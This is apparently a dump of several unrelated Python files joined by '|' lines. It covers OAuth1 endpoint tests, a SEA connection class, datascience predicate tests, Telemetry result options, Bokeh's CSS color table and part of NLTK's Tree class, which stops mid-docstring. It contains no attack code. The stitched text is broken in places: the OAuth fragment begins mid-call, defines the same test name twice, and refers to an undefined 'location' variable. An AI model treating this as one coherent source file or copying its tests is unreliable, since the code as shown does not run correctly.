self.assertRaises(errors.InvalidRequestError,
self.endpoint.create_authorization_response,
self.uri,
realms=['bar'])
def test_create_authorization_response(self):
self.validator.get_redirect_uri.return_value = 'https://c.b/cb'
h, b, s = self.endpoint.create_authorization_response(self.uri)
self.assertEqual(s, 302)
self.assertIn('Location', h)
self.assertTrue(location.startswith('https://c.b/cb'))
self.assertIn('oauth_verifier', location)
def test_create_authorization_response(self):
self.validator.get_redirect_uri.return_value = 'oob'
h, b, s = self.endpoint.create_authorization_response(self.uri)
self.assertEqual(s, 200)
self.assertNotIn('Location', h)
self.assertIn('oauth_verifier', b)
self.assertIn('oauth_token', b)
|
import Sea
from Connection import Connection
class ConnectionPoint(Connection):
"""
Class for point connections.
"""
def __init__(self, obj, system, components):
Connection.__init__(self, obj, system, components)
#obj.Sort = 'Point'
def updateComponents(self, obj):
connections = Sea.actions.connection.ShapeConnection([item.Shape for item in obj.Components])
commons = connections.commons()
if any([item.Vertexes for item in commons]):
"""
There is indeed a point connection.
"""
obj.Proxy.model.components = obj.Components
obj.updateCouplings()
|
import doctest
import pytest
from datascience import predicates
from datascience import *
def test_both():
"""Both f and g."""
p = are.above(2) & are.below(4)
ps = [p(x) for x in range(1, 6)]
assert ps == [False, False, True, False, False]
def test_either():
"""Either f or g."""
p = are.above(3) | are.below(2)
ps = [p(x) for x in range(1, 6)]
assert ps == [True, False, False, True, True]
def test_equal_to():
"""Equal to y."""
p = are.equal_to(1)
ps = [p(x) for x in range(1, 6)]
assert ps == [True, False, False, False, False]
def test_above():
"""Greater than y."""
p = are.above(3)
ps = [p(x) for x in range(1, 6)]
assert ps == [False, False, False, True, True]
def test_below():
"""Less than y."""
p = are.not_below(4)
ps = [p(x) for x in range(1, 6)]
assert ps == [False, False, False, True, True]
def test_above_or_equal_to():
"""Greater than or equal to y."""
p = are.above_or_equal_to(4)
ps = [p(x) for x in range(1, 6)]
assert ps == [False, False, False, True, True]
def test_below_or_equal_to():
"""Less than or equal to y."""
p = are.not_below_or_equal_to(3)
ps = [p(x) for x in range(1, 6)]
assert ps == [False, False, False, True, True]
def test_strictly_between():
"""Greater than y and less than z."""
p = are.strictly_between(2, 4)
ps = [p(x) for x in range(1, 6)]
assert ps == [False, False, True, False, False]
def test_between():
"""Greater than or equal to y and less than z."""
p = are.between(3, 4)
ps = [p(x) for x in range(1, 6)]
assert ps == [False, False, True, False, False]
def test_between_or_equal_to():
"""Greater than or equal to y and less than or equal to z."""
p = are.between_or_equal_to(3, 3)
ps = [p(x) for x in range(1, 6)]
assert ps == [False, False, True, False, False]
def test_doctests():
results = doctest.testmod(predicates,
optionflags=doctest.NORMALIZE_WHITESPACE)
assert results.failed == 0
|
import optparse
import os
import sys
from telemetry.core import util
from telemetry.results import buildbot_output_formatter
from telemetry.results import chart_json_output_formatter
from telemetry.results import csv_output_formatter
from telemetry.results import csv_pivot_table_output_formatter
from telemetry.results import gtest_progress_reporter
from telemetry.results import html_output_formatter
from telemetry.results import json_output_formatter
from telemetry.results import page_test_results
from telemetry.results import progress_reporter
_OUTPUT_FORMAT_CHOICES = ('html', 'buildbot', 'csv', 'gtest', 'json',
'chartjson', 'csv-pivot-table', 'none')
_OUTPUT_FILENAME_LOOKUP = {
'html': 'results.html',
'csv': 'results.csv',
'json': 'results.json',
'chartjson': 'results-chart.json',
'csv-pivot-table': 'results-pivot-table.csv'
}
def AddResultsOptions(parser):
group = optparse.OptionGroup(parser, 'Results options')
group.add_option('--chartjson', action='store_true',
help='Output Chart JSON. Ignores --output-format.')
group.add_option('--output-format', action='append', dest='output_formats',
choices=_OUTPUT_FORMAT_CHOICES, default=[],
help='Output format. Defaults to "%%default". '
'Can be %s.' % ', '.join(_OUTPUT_FORMAT_CHOICES))
group.add_option('-o', '--output',
dest='output_file',
default=None,
help='Redirects output to a file. Defaults to stdout.')
group.add_option('--output-dir', default=util.GetBaseDir(),
help='Where to save output data after the run.')
group.add_option('--output-trace-tag',
default='',
help='Append a tag to the key of each result trace. Use '
'with html, buildbot, csv-pivot-table output formats.')
group.add_option('--reset-results', action='store_true',
help='Delete all stored results.')
group.add_option('--upload-results', action='store_true',
help='Upload the results to cloud storage.')
group.add_option('--upload-bucket', default='internal',
choices=['public', 'partner', 'internal'],
help='Storage bucket to use for the uploaded results. '
'Defaults to internal. Supported values are: '
'public, partner, internal')
group.add_option('--results-label',
default=None,
help='Optional label to use for the results of a run .')
group.add_option('--suppress_gtest_report',
default=False,
help='Whether to suppress GTest progress report.')
parser.add_option_group(group)
def ProcessCommandLineArgs(parser, args):
# TODO(ariblue): Delete this flag entirely at some future data, when the
# existence of such a flag has been long forgotten.
if args.output_file:
parser.error('This flag is deprecated. Please use --output-dir instead.')
try:
os.makedirs(args.output_dir)
except OSError:
# Do nothing if the output directory already exists. Existing files will
# get overwritten.
pass
args.output_dir = os.path.expanduser(args.output_dir)
def _GetOutputStream(output_format, output_dir):
assert output_format in _OUTPUT_FORMAT_CHOICES, 'Must specify a valid format.'
assert output_format not in ('gtest', 'none'), (
'Cannot set stream for \'gtest\' or \'none\' output formats.')
if output_format == 'buildbot':
return sys.stdout
assert output_format in _OUTPUT_FILENAME_LOOKUP, (
'No known filename for the \'%s\' output format' % output_format)
output_file = os.path.join(output_dir, _OUTPUT_FILENAME_LOOKUP[output_format])
open(output_file, 'a').close() # Create file if it doesn't exist.
return open(output_file, 'r+')
def _GetProgressReporter(output_skipped_tests_summary, suppress_gtest_report):
if suppress_gtest_report:
return progress_reporter.ProgressReporter()
return gtest_progress_reporter.GTestProgressReporter(
sys.stdout, output_skipped_tests_summary=output_skipped_tests_summary)
def CreateResults(benchmark_metadata, options,
value_can_be_added_predicate=lambda v: True):
"""
Args:
options: Contains the options specified in AddResultsOptions.
"""
if not options.output_formats:
options.output_formats = [_OUTPUT_FORMAT_CHOICES[0]]
output_formatters = []
for output_format in options.output_formats:
if output_format == 'none' or output_format == "gtest" or options.chartjson:
continue
output_stream = _GetOutputStream(output_format, options.output_dir)
if output_format == 'csv':
output_formatters.append(csv_output_formatter.CsvOutputFormatter(
output_stream))
elif output_format == 'csv-pivot-table':
output_formatters.append(
csv_pivot_table_output_formatter.CsvPivotTableOutputFormatter(
output_stream, trace_tag=options.output_trace_tag))
elif output_format == 'buildbot':
output_formatters.append(
buildbot_output_formatter.BuildbotOutputFormatter(
output_stream, trace_tag=options.output_trace_tag))
elif output_format == 'html':
# TODO(chrishenry): We show buildbot output so that users can grep
# through the results easily without needing to open the html
# file. Another option for this is to output the results directly
# in gtest-style results (via some sort of progress reporter),
# as we plan to enable gtest-style output for all output formatters.
output_formatters.append(
buildbot_output_formatter.BuildbotOutputFormatter(
sys.stdout, trace_tag=options.output_trace_tag))
output_formatters.append(html_output_formatter.HtmlOutputFormatter(
output_stream, benchmark_metadata, options.reset_results,
options.upload_results, options.browser_type,
options.results_label, trace_tag=options.output_trace_tag))
elif output_format == 'json':
output_formatters.append(json_output_formatter.JsonOutputFormatter(
output_stream, benchmark_metadata))
elif output_format == 'chartjson':
output_formatters.append(
chart_json_output_formatter.ChartJsonOutputFormatter(
output_stream, benchmark_metadata))
else:
# Should never be reached. The parser enforces the choices.
raise Exception('Invalid --output-format "%s". Valid choices are: %s'
% (output_format, ', '.join(_OUTPUT_FORMAT_CHOICES)))
# TODO(chrishenry): This is here to not change the output of
# gtest. Let's try enabling skipped tests summary for gtest test
# results too (in a separate patch), and see if we break anything.
output_skipped_tests_summary = 'gtest' in options.output_formats
reporter = _GetProgressReporter(output_skipped_tests_summary,
options.suppress_gtest_report)
return page_test_results.PageTestResults(
output_formatters=output_formatters, progress_reporter=reporter,
output_dir=options.output_dir,
value_can_be_added_predicate=value_can_be_added_predicate)
|
''' Provide the standard 147 CSS (X11) named colors.
'''
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
from .util import NamedColor
aliceblue = NamedColor("aliceblue", 240, 248, 255)
antiquewhite = NamedColor("antiquewhite", 250, 235, 215)
aqua = NamedColor("aqua", 0, 255, 255)
aquamarine = NamedColor("aquamarine", 127, 255, 212)
azure = NamedColor("azure", 240, 255, 255)
beige = NamedColor("beige", 245, 245, 220)
bisque = NamedColor("bisque", 255, 228, 196)
black = NamedColor("black", 0, 0, 0 )
blanchedalmond = NamedColor("blanchedalmond", 255, 235, 205)
blue = NamedColor("blue", 0, 0, 255)
blueviolet = NamedColor("blueviolet", 138, 43, 226)
brown = NamedColor("brown", 165, 42, 42 )
burlywood = NamedColor("burlywood", 222, 184, 135)
cadetblue = NamedColor("cadetblue", 95, 158, 160)
chartreuse = NamedColor("chartreuse", 127, 255, 0 )
chocolate = NamedColor("chocolate", 210, 105, 30 )
coral = NamedColor("coral", 255, 127, 80 )
cornflowerblue = NamedColor("cornflowerblue", 100, 149, 237)
cornsilk = NamedColor("cornsilk", 255, 248, 220)
crimson = NamedColor("crimson", 220, 20, 60 )
cyan = NamedColor("cyan", 0, 255, 255)
darkblue = NamedColor("darkblue", 0, 0, 139)
darkcyan = NamedColor("darkcyan", 0, 139, 139)
darkgoldenrod = NamedColor("darkgoldenrod", 184, 134, 11 )
darkgray = NamedColor("darkgray", 169, 169, 169)
darkgreen = NamedColor("darkgreen", 0, 100, 0 )
darkgrey = NamedColor("darkgrey", 169, 169, 169)
darkkhaki = NamedColor("darkkhaki", 189, 183, 107)
darkmagenta = NamedColor("darkmagenta", 139, 0, 139)
darkolivegreen = NamedColor("darkolivegreen", 85, 107, 47 )
darkorange = NamedColor("darkorange", 255, 140, 0 )
darkorchid = NamedColor("darkorchid", 153, 50, 204)
darkred = NamedColor("darkred", 139, 0, 0 )
darksalmon = NamedColor("darksalmon", 233, 150, 122)
darkseagreen = NamedColor("darkseagreen", 143, 188, 143)
darkslateblue = NamedColor("darkslateblue", 72, 61, 139)
darkslategray = NamedColor("darkslategray", 47, 79, 79 )
darkslategrey = NamedColor("darkslategrey", 47, 79, 79 )
darkturquoise = NamedColor("darkturquoise", 0, 206, 209)
darkviolet = NamedColor("darkviolet", 148, 0, 211)
deeppink = NamedColor("deeppink", 255, 20, 147)
deepskyblue = NamedColor("deepskyblue", 0, 191, 255)
dimgray = NamedColor("dimgray", 105, 105, 105)
dimgrey = NamedColor("dimgrey", 105, 105, 105)
dodgerblue = NamedColor("dodgerblue", 30, 144, 255)
firebrick = NamedColor("firebrick", 178, 34, 34 )
floralwhite = NamedColor("floralwhite", 255, 250, 240)
forestgreen = NamedColor("forestgreen", 34, 139, 34 )
fuchsia = NamedColor("fuchsia", 255, 0, 255)
gainsboro = NamedColor("gainsboro", 220, 220, 220)
ghostwhite = NamedColor("ghostwhite", 248, 248, 255)
gold = NamedColor("gold", 255, 215, 0 )
goldenrod = NamedColor("goldenrod", 218, 165, 32 )
gray = NamedColor("gray", 128, 128, 128)
green = NamedColor("green", 0, 128, 0 )
greenyellow = NamedColor("greenyellow", 173, 255, 47 )
grey = NamedColor("grey", 128, 128, 128)
honeydew = NamedColor("honeydew", 240, 255, 240)
hotpink = NamedColor("hotpink", 255, 105, 180)
indianred = NamedColor("indianred", 205, 92, 92 )
indigo = NamedColor("indigo", 75, 0, 130)
ivory = NamedColor("ivory", 255, 255, 240)
khaki = NamedColor("khaki", 240, 230, 140)
lavender = NamedColor("lavender", 230, 230, 250)
lavenderblush = NamedColor("lavenderblush", 255, 240, 245)
lawngreen = NamedColor("lawngreen", 124, 252, 0 )
lemonchiffon = NamedColor("lemonchiffon", 255, 250, 205)
lightblue = NamedColor("lightblue", 173, 216, 230)
lightcoral = NamedColor("lightcoral", 240, 128, 128)
lightcyan = NamedColor("lightcyan", 224, 255, 255)
lightgoldenrodyellow = NamedColor("lightgoldenrodyellow", 250, 250, 210)
lightgray = NamedColor("lightgray", 211, 211, 211)
lightgreen = NamedColor("lightgreen", 144, 238, 144)
lightgrey = NamedColor("lightgrey", 211, 211, 211)
lightpink = NamedColor("lightpink", 255, 182, 193)
lightsalmon = NamedColor("lightsalmon", 255, 160, 122)
lightseagreen = NamedColor("lightseagreen", 32, 178, 170)
lightskyblue = NamedColor("lightskyblue", 135, 206, 250)
lightslategray = NamedColor("lightslategray", 119, 136, 153)
lightslategrey = NamedColor("lightslategrey", 119, 136, 153)
lightsteelblue = NamedColor("lightsteelblue", 176, 196, 222)
lightyellow = NamedColor("lightyellow", 255, 255, 224)
lime = NamedColor("lime", 0, 255, 0 )
limegreen = NamedColor("limegreen", 50, 205, 50 )
linen = NamedColor("linen", 250, 240, 230)
magenta = NamedColor("magenta", 255, 0, 255)
maroon = NamedColor("maroon", 128, 0, 0 )
mediumaquamarine = NamedColor("mediumaquamarine", 102, 205, 170)
mediumblue = NamedColor("mediumblue", 0, 0, 205)
mediumorchid = NamedColor("mediumorchid", 186, 85, 211)
mediumpurple = NamedColor("mediumpurple", 147, 112, 219)
mediumseagreen = NamedColor("mediumseagreen", 60, 179, 113)
mediumslateblue = NamedColor("mediumslateblue", 123, 104, 238)
mediumspringgreen = NamedColor("mediumspringgreen", 0, 250, 154)
mediumturquoise = NamedColor("mediumturquoise", 72, 209, 204)
mediumvioletred = NamedColor("mediumvioletred", 199, 21, 133)
midnightblue = NamedColor("midnightblue", 25, 25, 112)
mintcream = NamedColor("mintcream", 245, 255, 250)
mistyrose = NamedColor("mistyrose", 255, 228, 225)
moccasin = NamedColor("moccasin", 255, 228, 181)
navajowhite = NamedColor("navajowhite", 255, 222, 173)
navy = NamedColor("navy", 0, 0, 128)
oldlace = NamedColor("oldlace", 253, 245, 230)
olive = NamedColor("olive", 128, 128, 0 )
olivedrab = NamedColor("olivedrab", 107, 142, 35 )
orange = NamedColor("orange", 255, 165, 0 )
orangered = NamedColor("orangered", 255, 69, 0 )
orchid = NamedColor("orchid", 218, 112, 214)
palegoldenrod = NamedColor("palegoldenrod", 238, 232, 170)
palegreen = NamedColor("palegreen", 152, 251, 152)
paleturquoise = NamedColor("paleturquoise", 175, 238, 238)
palevioletred = NamedColor("palevioletred", 219, 112, 147)
papayawhip = NamedColor("papayawhip", 255, 239, 213)
peachpuff = NamedColor("peachpuff", 255, 218, 185)
peru = NamedColor("peru", 205, 133, 63 )
pink = NamedColor("pink", 255, 192, 203)
plum = NamedColor("plum", 221, 160, 221)
powderblue = NamedColor("powderblue", 176, 224, 230)
purple = NamedColor("purple", 128, 0, 128)
red = NamedColor("red", 255, 0, 0 )
rosybrown = NamedColor("rosybrown", 188, 143, 143)
royalblue = NamedColor("royalblue", 65, 105, 225)
saddlebrown = NamedColor("saddlebrown", 139, 69, 19 )
salmon = NamedColor("salmon", 250, 128, 114)
sandybrown = NamedColor("sandybrown", 244, 164, 96 )
seagreen = NamedColor("seagreen", 46, 139, 87 )
seashell = NamedColor("seashell", 255, 245, 238)
sienna = NamedColor("sienna", 160, 82, 45 )
silver = NamedColor("silver", 192, 192, 192)
skyblue = NamedColor("skyblue", 135, 206, 235)
slateblue = NamedColor("slateblue", 106, 90, 205)
slategray = NamedColor("slategray", 112, 128, 144)
slategrey = NamedColor("slategrey", 112, 128, 144)
snow = NamedColor("snow", 255, 250, 250)
springgreen = NamedColor("springgreen", 0, 255, 127)
steelblue = NamedColor("steelblue", 70, 130, 180)
tan = NamedColor("tan", 210, 180, 140)
teal = NamedColor("teal", 0, 128, 128)
thistle = NamedColor("thistle", 216, 191, 216)
tomato = NamedColor("tomato", 255, 99, 71 )
turquoise = NamedColor("turquoise", 64, 224, 208)
violet = NamedColor("violet", 238, 130, 238)
wheat = NamedColor("wheat", 245, 222, 179)
white = NamedColor("white", 255, 255, 255)
whitesmoke = NamedColor("whitesmoke", 245, 245, 245)
yellow = NamedColor("yellow", 255, 255, 0 )
yellowgreen = NamedColor("yellowgreen", 154, 205, 50 )
__all__ = NamedColor.__all__
|
"""
Class for representing hierarchical language structures, such as
syntax trees and morphological trees.
"""
from __future__ import print_function, unicode_literals
import re
from nltk.grammar import Production, Nonterminal
from nltk.probability import ProbabilisticMixIn
from nltk.util import slice_bounds
from nltk.compat import string_types, python_2_unicode_compatible, unicode_repr
from nltk.internals import raise_unorderable_types
@python_2_unicode_compatible
class Tree(list):
"""
A Tree represents a hierarchical grouping of leaves and subtrees.
For example, each constituent in a syntax tree is represented by a single Tree.
A tree's children are encoded as a list of leaves and subtrees,
where a leaf is a basic (non-tree) value; and a subtree is a
nested Tree.
>>> from nltk.tree import Tree
>>> print(Tree(1, [2, Tree(3, [4]), 5]))
(1 2 (3 4) 5)
>>> vp = Tree('VP', [Tree('V', ['saw']),
... Tree('NP', ['him'])])
>>> s = Tree('S', [Tree('NP', ['I']), vp])
>>> print(s)
(S (NP I) (VP (V saw) (NP him)))
>>> print(s[1])
(VP (V saw) (NP him))
>>> print(s[1,1])
(NP him)
>>> t = Tree.fromstring("(S (NP I) (VP (V saw) (NP him)))")
>>> s == t
True
>>> t[1][1].set_label('X')
>>> t[1][1].label()
'X'
>>> print(t)
(S (NP I) (VP (V saw) (X him)))
>>> t[0], t[1,1] = t[1,1], t[0]
>>> print(t)
(S (X him) (VP (V saw) (NP I)))
The length of a tree is the number of children it has.
>>> len(t)
2
The set_label() and label() methods allow individual constituents
to be labeled. For example, syntax trees use this label to specify
phrase tags, such as "NP" and "VP".
Several Tree methods use "tree positions" to specify
children or descendants of a tree. Tree positions are defined as
follows:
- The tree position *i* specifies a Tree's *i*\ th child.
- The tree position ``()`` specifies the Tree itself.
- If *p* is the tree position of descendant *d*, then
*p+i* specifies the *i*\ th child of *d*.
I.e., every tree position is either a single index *i*,
specifying ``tree[i]``; or a sequence *i1, i2, ..., iN*,
specifying ``tree[i1][i2]...[iN]``.
Construct a new tree. This constructor can be called in one
of two ways:
- ``Tree(label, children)`` constructs a new tree with the
specified label and list of children.
- ``Tree.fromstring(s)`` constructs a new tree by parsing the string ``s``.
"""
def __init__(self, node, children=None):
if children is None:
raise TypeError("%s: Expected a node value and child list "
% type(self).__name__)
elif isinstance(children, string_types):
raise TypeError("%s() argument 2 should be a list, not a "
"string" % type(self).__name__)
else:
list.__init__(self, children)
self._label = node
#////////////////////////////////////////////////////////////
# Comparison operators
#////////////////////////////////////////////////////////////
def __eq__(self, other):
return (self.__class__ is other.__class__ and
(self._label, list(self)) == (other._label, list(other)))
def __lt__(self, other):
if not isinstance(other, Tree):
# raise_unorderable_types("<", self, other)
# Sometimes children can be pure strings,
# so we need to be able to compare with non-trees:
return self.__class__.__name__ < other.__class__.__name__
elif self.__class__ is other.__class__:
return (self._label, list(self)) < (other._label, list(other))
else:
return self.__class__.__name__ < other.__class__.__name__
# @total_ordering doesn't work here, since the class inherits from a builtin class
__ne__ = lambda self, other: not self == other
__gt__ = lambda self, other: not (self < other or self == other)
__le__ = lambda self, other: self < other or self == other
__ge__ = lambda self, other: not self < other
#////////////////////////////////////////////////////////////
# Disabled list operations
#////////////////////////////////////////////////////////////
def __mul__(self, v):
raise TypeError('Tree does not support multiplication')
def __rmul__(self, v):
raise TypeError('Tree does not support multiplication')
def __add__(self, v):
raise TypeError('Tree does not support addition')
def __radd__(self, v):
raise TypeError('Tree does not support addition')
#////////////////////////////////////////////////////////////
# Indexing (with support for tree positions)
#////////////////////////////////////////////////////////////
def __getitem__(self, index):
if isinstance(index, (int, slice)):
return list.__getitem__(self, index)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
return self
elif len(index) == 1:
return self[index[0]]
else:
return self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __setitem__(self, index, value):
if isinstance(index, (int, slice)):
return list.__setitem__(self, index, value)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
raise IndexError('The tree position () may not be '
'assigned to.')
elif len(index) == 1:
self[index[0]] = value
else:
self[index[0]][index[1:]] = value
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __delitem__(self, index):
if isinstance(index, (int, slice)):
return list.__delitem__(self, index)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
raise IndexError('The tree position () may not be deleted.')
elif len(index) == 1:
del self[index[0]]
else:
del self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
#////////////////////////////////////////////////////////////
# Basic tree operations
#////////////////////////////////////////////////////////////
def _get_node(self):
"""Outdated method to access the node value; use the label() method instead."""
raise NotImplementedError("Use label() to access a node label.")
def _set_node(self, value):
"""Outdated method to set the node value; use the set_label() method instead."""
raise NotImplementedError("Use set_label() method to set a node label.")
node = property(_get_node, _set_node)
def label(self):
"""
Return the node label of the tree.
>>> t = Tree.fromstring('(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))')
>>> t.label()
'S'
:return: the node label (typically a string)
:rtype: any
"""
return self._label
def set_label(self, label):
"""
Set the node label of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.set_label("T")
>>> print(t)
(T (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))
:param label: the node label (typically a string)
:type label: any
"""
self._label = label
def leaves(self):
"""
Return the leaves of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.leaves()
['the', 'dog', 'chased', 'the', 'cat']
:return: a list containing this tree's leaves.
The order reflects the order of the
leaves in the tree's hierarchical structure.
:rtype: list
"""
leaves = []
for child in self:
if isinstance(child, Tree):
leaves.extend(child.leaves())
else:
leaves.append(child)
return leaves
def flatten(self):
"""
Return a flat version of the tree, with all non-root non-terminals removed.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> print(t.flatten())
(S the dog chased the cat)
:return: a tree consisting of this tree's root connected directly to
its leaves, omitting all intervening non-terminal nodes.
:rtype: Tree
"""
return Tree(self.label(), self.leaves())
def height(self):
"""
Return the height of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.height()
5
>>> print(t[0,0])
(D the)
>>> t[0,0].height()
2
:return: The height of this tree. The height of a tree
containing no children is 1; the height of a tree
containing only leaves is 2; and the height of any other
tree is one plus the maximum of its children's
heights.
:rtype: int
"""
max_child_height = 0
for child in self:
if isinstance(child, Tree):
max_child_height = max(max_child_height, child.height())
else:
max_child_height = max(max_child_height, 1)
return 1 + max_child_height
def treepositions(self, order='preorder'):
"""
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.treepositions() # doctest: +ELLIPSIS
[(), (0,), (0, 0), (0, 0, 0), (0, 1), (0, 1, 0), (1,), (1, 0), (1, 0, 0), ...]
>>> for pos in t.treepositions('leaves'):
... t[pos] = t[pos][::-1].upper()
>>> print(t)
(S (NP (D EHT) (N GOD)) (VP (V DESAHC) (NP (D EHT) (N TAC))))
:param order: One of: ``preorder``, ``postorder``, ``bothorder``,
``leaves``.
"""
positions = []
if order in ('preorder', 'bothorder'): positions.append( () )
for i, child in enumerate(self):
if isinstance(child, Tree):
childpos = child.treepositions(order)
positions.extend((i,)+p for p in childpos)
else:
positions.append( (i,) )
if order in ('postorder', 'bothorder'): positions.append( () )
return positions
def subtrees(self, filter=None):
"""
Generate all the subtrees of this tree, optionally restricted
to trees matching the filter function.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> for s in t.subtrees(lambda t: t.height() == 2):
... print(s)
(D the)
(N dog)
(V chased)
(D the)
(N cat)
:type filter: function
:param filter: the function to filter all local trees
"""
if not filter or filter(self):
yield self
for child in self:
if isinstance(child, Tree):
for subtree in child.subtrees(filter):
yield subtree
def productions(self):
"""
Generate the productions that correspond to the non-terminal nodes of the tree.
For each subtree of the form (P: C1 C2 ... Cn) this produces a production of the
form P -> C1 C2 ... Cn.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.productions()
[S -> NP VP, NP -> D N, D -> 'the', N -> 'dog', VP -> V NP, V -> 'chased',
NP -> D N, D -> 'the', N -> 'cat']
:rtype: list(Production)
"""
if not isinstance(self._label, string_types):
raise TypeError('Productions can only be generated from trees having node labels that are strings')
prods = [Production(Nonterminal(self._label), _child_names(self))]
for child in self:
if isinstance(child, Tree):
prods += child.productions()
return prods
def pos(self):
"""
Return a sequence of pos-tagged words extracted from the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.pos()
[('the', 'D'), ('dog', 'N'), ('chased', 'V'), ('the', 'D'), ('cat', 'N')]
:return: a list of tuples containing leaves and pre-terminals (part-of-speech tags).
The order reflects the order of the leaves in the tree's hierarchical structure.
:rtype: list(tuple)
"""
pos = []
for child in self:
if isinstance(child, Tree):
pos.extend(child.pos())
else:
pos.append((child, self._label))
return pos
def leaf_treeposition(self, index):
"""
:return: The tree position of the ``index``-th leaf in this
tree. I.e., if ``tp=self.leaf_treeposition(i)``, then
``self[tp]==self.leaves()[i]``.
:raise IndexError: If this tree contains fewer than ``index+1``
leaves, or if ``index<0``.
"""
if index < 0: raise IndexError('index must be non-negative')
stack = [(self, ())]
while stack:
value, treepos = stack.pop()
if not isinstance(value, Tree):
if index == 0: return treepos
else: index -= 1
else:
for i in range(len(value)-1, -1, -1):
stack.append( (value[i], treepos+(i,)) )
raise IndexError('index must be less than or equal to len(self)')
def treeposition_spanning_leaves(self, start, end):
"""
:return: The tree position of the lowest descendant of this
tree that dominates ``self.leaves()[start:end]``.
:raise ValueError: if ``end <= start``
"""
if end <= start:
raise ValueError('end must be greater than start')
# Find the tree positions of the start & end leaves, and
# take the longest common subsequence.
start_treepos = self.leaf_treeposition(start)
end_treepos = self.leaf_treeposition(end-1)
# Find the first index where they mismatch:
for i in range(len(start_treepos)):
if i == len(end_treepos) or start_treepos[i] != end_treepos[i]:
return start_treepos[:i]
return start_treepos
#////////////////////////////////////////////////////////////
# Transforms
#////////////////////////////////////////////////////////////
def chomsky_normal_form(self, factor="right", horzMarkov=None, vertMarkov=0, childChar="|", parentChar="^"):
"""
This method can modify a tree in three ways:
1. Convert a tree into its Chomsky Normal Form (CNF)
equivalent -- Every subtree has either two non-terminals
or one terminal as its children. This process requires
the creation of more"artificial" non-terminal nodes.
2. Markov (vertical) smoothing of children in new artificial
nodes
3. Horizontal (parent) annotation of nodes
:param factor: Right or left factoring method (default = "right")
:type factor: str = [left|right]
:param horzMarkov: Markov order for sibling smoothing in artificial nodes (None (default) = include all siblings)
:type horzMarkov: int | None
:param vertMarkov: Markov order for parent smoothing (0 (default) = no vertical annotation)
:type vertMarkov: int | None
:param childChar: A string used in construction of the artificial nodes, separating the head of the
original subtree from the child nodes that have yet to be expanded (default = "|")
:type childChar: str
:param parentChar: A string used to separate the node representation from its vertical annotation
:type parentChar: str
"""
from nltk.treetransforms import chomsky_normal_form
chomsky_normal_form(self, factor, horzMarkov, vertMarkov, childChar, parentChar)
def un_chomsky_normal_form(self, expandUnary = True, childChar = "|", parentChar = "^", unaryChar = "+"):
"""
This method modifies the tree in three ways:
1. Transforms a tree in Chomsky Normal Form back to its
original structure (branching greater than two)
2. Removes any parent annotation (if it exists)
3. (optional) expands unary subtrees (if previously
collapsed with collapseUnary(...) )
:param expandUnary: Flag to expand unary or not (default = True)
:type expandUnary: bool
:param childChar: A string separating the head node from its children in an artificial node (default = "|")
:type childChar: str
:param parentChar: A sting separating the node label from its parent annotation (default = "^")
:type parentChar: str
:param unaryChar: A string joining two non-terminals in a unary production (default = "+")
:type unaryChar: str
"""
from nltk.treetransforms import un_chomsky_normal_form
un_chomsky_normal_form(self, expandUnary, childChar, parentChar, unaryChar)
def collapse_unary(self, collapsePOS = False, collapseRoot = False, joinChar = "+"):
"""
Collapse subtrees with a single child (ie. unary productions)
into a new non-terminal (Tree node) joined by 'joinChar'.
This is useful when working with algorithms that do not allow
unary productions, and completely removing the unary productions
would require loss of useful information. The Tree is modified
directly (since it is passed by reference) and no value is returned.
:param collapsePOS: 'False' (default) will not collapse the parent of leaf nodes (ie.
Part-of-Speech tags) since they are always unary productions
:type collapsePOS: bool
:param collapseRoot: 'False' (default) will not modify the root production
if it is unary. For the Penn WSJ treebank corpus, this corresponds
to the TOP -> productions.
:type collapseRoot: bool
:param joinChar: A string used to connect collapsed node values (default = "+")
:type joinChar: str
"""
from nltk.treetransforms import collapse_unary
collapse_unary(self, collapsePOS, collapseRoot, joinChar)
#////////////////////////////////////////////////////////////
# Convert, copy
#////////////////////////////////////////////////////////////
@classmethod
def convert(cls, tree):
"""
Convert a tree between different subtypes of Tree. ``cls`` determines
which class will be used to encode the new tree.
:type tree: Tree
:param tree: The tree that should be converted.
:return: The new Tree.
"""
if isinstance(tree, Tree):
children = [cls.convert(child) for child in tree]
return cls(tree._label, children)
else:
return tree
def copy(self, deep=False):
if not deep: return type(self)(self._label, self)
else: return type(self).convert(self)
def _frozen_class(self): return ImmutableTree
def freeze(self, leaf_freezer=None):
frozen_class = self._frozen_class()
if leaf_freezer is None:
newcopy = frozen_class.convert(self)
else:
newcopy = self.copy(deep=True)
for pos in newcopy.treepositions('leaves'):
newcopy[pos] = leaf_freezer(newcopy[pos])
newcopy = frozen_class.convert(newcopy)
hash(newcopy) # Make sure the leaves are hashable.
return newcopy
#////////////////////////////////////////////////////////////
# Parsing
#////////////////////////////////////////////////////////////
@classmethod
def fromstring(cls, s, brackets='()', read_node=None, read_leaf=None,
node_pattern=None, leaf_pattern=None,
remove_empty_top_bracketing=False):
"""
Read a bracketed tree string and return the resulting tree.
Trees are represented as nested brackettings, such as::
(S (NP (NNP John)) (VP (V runs)))
:type s: str
:param s: The string to read
